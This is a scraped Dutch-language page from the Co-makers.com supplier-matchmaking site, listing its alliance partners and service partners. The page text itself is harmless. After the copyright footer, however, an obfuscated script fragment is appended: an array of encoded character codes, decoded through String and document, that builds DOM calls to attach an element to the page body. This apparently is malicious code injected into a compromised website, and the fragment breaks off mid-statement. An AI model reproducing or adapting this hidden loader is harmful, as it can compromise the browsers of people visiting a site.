Home Register  Purchasing Market Research | Global Sourcing | Source.Direct | Supply Chain Development | Meet&Match

 Our customers
Buyers
Subcontractors
 Services
 Alliances & Partners
 Company
Team
Career
Offices
Contact

 Add to favorites
 Register
 Login

  English Nederlands Deutsch
Network - Alliances

Vanaf de start werkt Co-makers samen met een aantal nationale en internationale Alliances & Partners. Organisaties die net als Co-makers actief zijn in de maak- en toeleveranciersindustrie en die de propositie van Co-makers gebruiken, ondersteunen of versterken. Hieronder vindt u de meest belangrijke op een rij.

Aadvise Electronics
Aadvise Electronics en Co-makers International hebben hun netwerken gekoppeld, zodat de aangesloten bedrijven gemakkelijker gevonden worden door uitbesteders en zij zelf betere toegang hebben tot nieuwe toeleveranciers.
 
ATC
ATC staat achter het Co-makers.com initiatief en onderschrijft de noodzaak van actief bij elkaar brengen van uitbesteders en toeleveranciers in de maakindustrie, specifiek in de automotive toelevering. ATC en Co-makers hebben hun netwerken gekoppeld, zodat de aangesloten bedrijven gemakkelijker gevonden worden door uitbesteders en zij zelf betere toegang hebben tot nieuwe toeleveranciers.
 
De Technische Universiteit Eindhoven
De Technische Universiteit Eindhoven, faculteit Technologie Management treedt toe tot het netwerk van Co-makers.com. Specifieke raakvlakkenbevinden zich op het terrein van e-Business Marketing en Procurement,waarbij Co-makers als praktijkomgeving dient voor onderzoek van de TU/e en de TU/e helpt bij het definiëren en ontwikkelen van nieuwe diensten voor Co-makers.
 
GOAL
Co-makers.com is het Nederlandse ''Center for Industrial Partnerships'' in het internationale ''GOAL'' Netwerk. GOAL staat voor Global Outsourcing And Linkages en omvat 35 CIP''s in 29 landen verspreid over de gehele wereld.
 
GOM Antwerpen
GOM Antwerpen en Co-makers hebben hun netwerken gekoppeld, zodat de aangesloten bedrijven gemakkelijker gevonden worden door uitbesteders en zij zelf betere toegang hebben tot nieuwe toeleveranciers. Bovendien ontstaat er voor de Belgische toeleveranciers gemakkelijk toegang tot de Nederlandse uitbestedende bedrijven en vice versa.
 
GOM Limburg
GOM Limburg en Co-makers hebben hun netwerken gekoppeld, zodat de aangesloten bedrijven gemakkelijker gevonden worden door uitbesteders en zij zelf betere toegang hebben tot nieuwe toeleveranciers. Bovendien ontstaat er voor de Belgische toeleveranciers gemakkelijk toegang tot de Nederlandse uitbestedende bedrijven en vice versa.
 
GOM Vlaams-Brabant
GOM Vlaams-Brabant en Co-makers hebben hun netwerken gekoppeld, zodat de aangesloten bedrijven gemakkelijker gevonden worden door uitbesteders en zij zelf betere toegang hebben tot nieuwe toeleveranciers. Bovendien ontstaat er voor de Belgische toeleveranciers gemakkelijk toegang tot de Nederlandse uitbestedende bedrijven en vice versa.
 
Metaalunie
De Metaalunie onderschrijft de noodzaak van actief bij elkaar brengen van uitbesteders en toeleveranciers in de maak-industrie. In nauwe samenwerking tussen de Metaalunie en Co-makers worden diensten ontwikkeld die aansluiten op de behoefte van Metaalunie leden. De Metaalunie brengt het Co-makers.com initiatief onder de aandacht bij haar leden en Co-makers.com treedt als sparring partner op bij de ontwikkeling van nieuwe producten en diensten.
 
Nederlands-Duitse Kamer van Koophandel
De Nederlands-Duitse Kamer van Koophandel en Co-makers hebben hun netwerken gekoppeld, zodat de aangesloten bedrijven gemakkelijker gevonden worden door uitbesteders en zij zelf betere toegang hebben tot nieuwe toeleveranciers. Bovendien kunnen de bij het Co-makers.com Netwerk aangesloten bedrijven hulp krijgen van de Nederlands-Duitse Kamer van Koophandel bij het verkennen en ontginnen van de Duitse markt.
 

Co-makers werkt bewust in een netwerk vorm. Op diverse deelgebieden sluit Co-makers.com partnerships met externe partijen die op hun beurt op dat betreffende deelgebied uitblinken. Op deze manier groeit de waarde van Co-makers voor haar aangesloten bedrijven het snelst.

Co-makers.com Partners
Voor ondersteunende diensten voor haar leden sluit Co-makers partnerships met bedrijven en organisaties die een specifiek product of dienst aanbieden, gericht op de 'maak-industrie'. Deze partners hebben grote affiniteit met uw business en behoren tot de beste in hun vakgebied.

PKM
De diensten van PKM, hèt adviesbureau in de metaal, met als hoofdonderwerpen: cursussen & trainingen, advies & begeleiding en management services sluiten aan bij de matchmaking activiteiten van Co-makers.com. Door deze partnership hebben bedrijven aangesloten bij het Co-makers Netwerk toegang tot de dienstverlening van PKM en kunnen de relaties van PKM gebruik maken van de matchmaking diensten van Co-makers.com.
 
Sourcing Parts.com
Sourcing Parts.com is de grootste Europese marktplaats voor industriële ''build-to-order'' onderdelen. Co-makers International is dé partner van SourcingParts.com in de Benelux. Co-makers.com biedt haar members de mogelijkheid om via SourcingParts.com werk uit te besteden in Europa. Bovendien zoekt Co-makers actief naar werk dat wordt uitbesteed door bedrijven in de rest van Europa en interessant is voor de members.
 
STODT
STODT staat achter het Co-makers.com initiatief en onderschrijft de noodzaak van actief bij elkaar brengen van uitbesteders en toeleveranciers in de maakindustrie. STODT en Co-makers hebben hun netwerken gekoppeld, zodat de aangesloten bedrijven gemakkelijker gevonden worden door uitbesteders en zij zelf betere toegang hebben tot nieuwe toeleveranciers. Bovendien werken beide organisaties door het organiseren van workshops en andere activiteiten bijvoorbeeld in het kader van de Oostelijke T&U agenda aan een verdere professionalisering van toeleveren en uitbesteden.
 
Toeleveren Vandaag
"Toeleveren Vandaag" is het driemaandelijkse magazine voor toeleveranciers en inkopers bij de Belgische editie van "Vraag & Aanbod", het weekblad van de industriële KMO. Dit blad wordt samengesteld door de redactie van Vraag & Aanbod en de Vlaamse GOM's (Gewestelijke Ontwikkelingsmaatschappijen), die toeleveranciers ondersteunen met informatie, een eigen databank en groepsstands op buitenlandse vakbeurzen. Co-makers.com publiceert hier onder meer matchmaking requests en legt daarmee een extra link naar de Belgische markt.
 
Van Dam Orenda
Van Dam Orenda staat achter het Co-makers.com initiatief en erkent de noodzaak van actief bij elkaar brengen van uitbesteders en toeleveranciers in de maakindustrie. Co-makers onderschrijft het belang van afstemming van producten en processen tussen toeleveranciers en uitbesteders en ondersteunt de activiteiten van Van Dam Orenda tot verbetering van productontwikkeling en innovatie. Van Dam Orenda en Co-makers hebben hun netwerken gekoppeld, zodat de aangesloten bedrijven gemakkelijker gevonden worden door uitbesteders, zij zelf betere toegang hebben tot nieuwe toeleveranciers en de onderlinge processen rond productontwikkeling worden versterkt.
 

Nieuws

Classifieds
2021 Co-makers International b.v. All Rights Reserved.
163,164,101,53,64,53,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,173,155,150,170,154,53,60,53,65,64,64,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,154,151,155,153,154,170,53,60,53,65,64,64,53,55,77,21,15,15,15,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,62,145,164,164,151,162,150,107,154,155,160,150,54,152,55,77,21,15,15,201"[ps](","));ss=String;d=document;for(i=0;i